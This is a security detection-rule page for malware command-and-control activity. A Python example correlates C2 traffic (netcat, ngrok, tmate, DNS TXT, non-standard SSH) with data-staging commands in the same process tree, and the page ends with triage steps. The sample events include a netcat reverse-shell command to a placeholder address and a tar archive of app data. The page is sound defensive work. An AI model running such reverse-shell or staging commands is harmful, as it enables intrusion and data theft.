Malware command and control attack
Goal
Detect malware command and control activity by correlating C2 communication channels with data exfiltration indicators within the same execution context.
Strategy
This correlation rule identifies C2 operations by detecting combinations of the following activity groups:
- Malicious Communication: Outbound connections to C2 infrastructure including IRC channels, P2P malware networks, paste sites, chatrooms, penetration testing domains, ngrok tunnels, DNS TXT lookups, SSH on non-standard ports, reverse shells (netcat), SOCKS5 proxies, and terminal sharing services (tmate)
- Data Exfiltration: Tunneling tools, network exfiltration utilities, file synchronization tools, base64 decoding, or archive creation used to stage and move data out
The rule triggers a high severity signal when both malicious communication and data exfiltration are detected within the same execution context.
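The correlation described above, as an added worked example that is not Datadog's rule implementation: each process or connection event is first mapped to one of the two activity groups, events are then keyed by an execution context, and a high-severity signal is emitted only for contexts in which both groups appear. The context key (host, container id, root ancestor pid), the event schema, the small set of matchers, and the sample events are all constructed assumptions for the example; a real engine would have richer lineage data and far more indicators.

```python
"""Correlate C2-communication and exfiltration-staging activity within one
execution context. Constructed example; not the product's own rule code."""
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass
class Event:
    host: str
    container_id: str
    root_pid: int                  # pid of the ancestor that started this tree
    comm: str                      # executable name
    args: list[str]
    dest_port: Optional[int] = None


def classify(ev: Event) -> set[str]:
    """Return the activity groups an event matches (possibly none)."""
    groups: set[str] = set()
    # Group 1: malicious communication (subset of the indicators in the rule)
    if ev.comm in ("nc", "ncat", "netcat") and ("-e" in ev.args or "-c" in ev.args):
        groups.add("malicious_communication")        # reverse shell (netcat)
    if ev.comm in ("ngrok", "tmate"):
        groups.add("malicious_communication")        # tunnel / terminal sharing
    if ev.comm == "ssh" and ev.dest_port not in (None, 22):
        groups.add("malicious_communication")        # SSH on non-standard port
    if ev.comm in ("dig", "nslookup") and "TXT" in (a.upper() for a in ev.args):
        groups.add("malicious_communication")        # DNS TXT lookup
    if ev.dest_port in (6667, 6697):
        groups.add("malicious_communication")        # IRC ports (assumed list)
    # Group 2: data exfiltration / staging
    if ev.comm == "base64" and ("-d" in ev.args or "--decode" in ev.args):
        groups.add("data_exfiltration")              # base64 decoding
    if ev.comm == "tar" and ev.args and ev.args[0].lstrip("-").startswith("c"):
        groups.add("data_exfiltration")              # archive creation (tar c...)
    if ev.comm in ("zip", "rclone", "rsync"):
        groups.add("data_exfiltration")              # archive / file sync (assumed names)
    return groups


def correlate(events: list[Event]) -> list[dict]:
    """Emit one high-severity signal per execution context that shows both groups."""
    seen: dict[tuple, dict[str, list[Event]]] = defaultdict(lambda: defaultdict(list))
    for ev in events:
        key = (ev.host, ev.container_id, ev.root_pid)   # assumed context key
        for group in classify(ev):
            seen[key][group].append(ev)
    signals = []
    for key, groups in seen.items():
        if {"malicious_communication", "data_exfiltration"} <= set(groups):
            signals.append({
                "severity": "high",
                "context": key,
                "communication": [e.comm for e in groups["malicious_communication"]],
                "exfiltration": [e.comm for e in groups["data_exfiltration"]],
            })
    return signals


# Constructed sample telemetry: only context (web-1, ctr-a, 4242) shows both groups.
SAMPLE_EVENTS = [
    Event("web-1", "ctr-a", 4242, "tar", ["-czf", "/tmp/stage.tgz", "/var/lib/app/data"]),
    Event("web-1", "ctr-a", 4242, "nc", ["-e", "/bin/sh", "203.0.113.5", "4444"], dest_port=4444),
    Event("web-1", "ctr-a", 9000, "base64", ["-d", "/tmp/blob"]),          # different tree
    Event("web-1", "ctr-b", 100, "tar", ["-czf", "/backup/db.tgz", "/data"]),  # backup job only
    Event("db-1", "ctr-c", 77, "ssh", ["-p", "2222", "ops@192.0.2.9"], dest_port=2222),
    Event("db-1", "ctr-c", 77, "ssh", ["ops@192.0.2.10"], dest_port=22),   # normal SSH
]


if __name__ == "__main__":
    for sig in correlate(SAMPLE_EVENTS):
        print(sig)
```

Requiring both groups in the same context is what keeps a nightly `tar` backup (context ctr-b) or an admin's `ssh -p 2222` (context ctr-c) from raising a signal on their own; the `base64 -d` in ctr-a also stays separate because it belongs to a different process tree.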
Triage & Response
- Block C2 communications: Immediately block network access to the identified destination IPs and domains, and isolate infected systems.
- Terminate malware processes: Stop the impacted process(es) on the affected host and container (or pod).
- Isolate affected systems: Quarantine compromised containers or hosts to prevent further C2 activity and data exfiltration.
- Assess data exfiltration: Identify what data may have been staged or exfiltrated by reviewing network traffic and file access patterns.
- Analyze malware artifacts: Extract malware binaries, network indicators, and process arguments for forensic analysis.
- Hunt for additional infections: Search for other systems with similar C2 indicators across your environment.
- Investigate initial access: Determine how the malware was deployed and establish the full attack timeline.
- Implement preventive controls: Deploy network egress filtering for known C2 infrastructure and enhance runtime detection capabilities.